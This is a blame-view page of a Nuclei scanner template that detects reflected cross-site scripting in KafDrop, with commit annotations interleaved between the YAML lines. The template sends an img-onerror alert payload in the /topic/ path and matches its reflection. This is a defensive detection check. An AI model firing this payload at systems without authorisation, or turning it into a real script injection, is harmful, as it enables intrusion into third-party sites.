daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/vulnerabilities/other/kafdrop-xss.yaml

29 lines
706 B
YAML
Raw Normal View History

Create kafdrop-xss.yaml
2021-05-05 18:21:53 +00:00
id: kafdrop-xss
info:
Dashboard Content Enhancements (#4381) Dashboard Content Enhancements
2022-05-13 20:26:43 +00:00
name: KafDrop - Cross-Site Scripting
Create kafdrop-xss.yaml
2021-05-05 18:21:53 +00:00
author: dhiyaneshDk
minor update
2021-05-07 09:26:40 +00:00
severity: medium
Dashboard Content Enhancements (#4381) Dashboard Content Enhancements
2022-05-13 20:26:43 +00:00
description: A vulnerability in KafDrop allows remote unauthenticated attackers to inject arbitrary HTML and/or JavaScript into the response returned by the server.
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes
2022-04-22 10:38:41 +00:00
reference:
- https://github.com/HomeAdvisor/Kafdrop/issues/12
tags: kafdrop,xss
Create kafdrop-xss.yaml
2021-05-05 18:21:53 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/topic/e'%22%3E%3Cimg%20src=x%20onerror=alert(2)%3E"
minor update
2021-05-07 09:26:40 +00:00
Create kafdrop-xss.yaml
2021-05-05 18:21:53 +00:00
matchers-condition: and
matchers:
- type: word
words:
- 'Kafdrop'
- '<img src=x onerror=alert(2)>'
part: body
minor update
2021-05-07 09:26:40 +00:00
condition: and
Create kafdrop-xss.yaml
2021-05-05 18:21:53 +00:00
- type: status
status:
- 500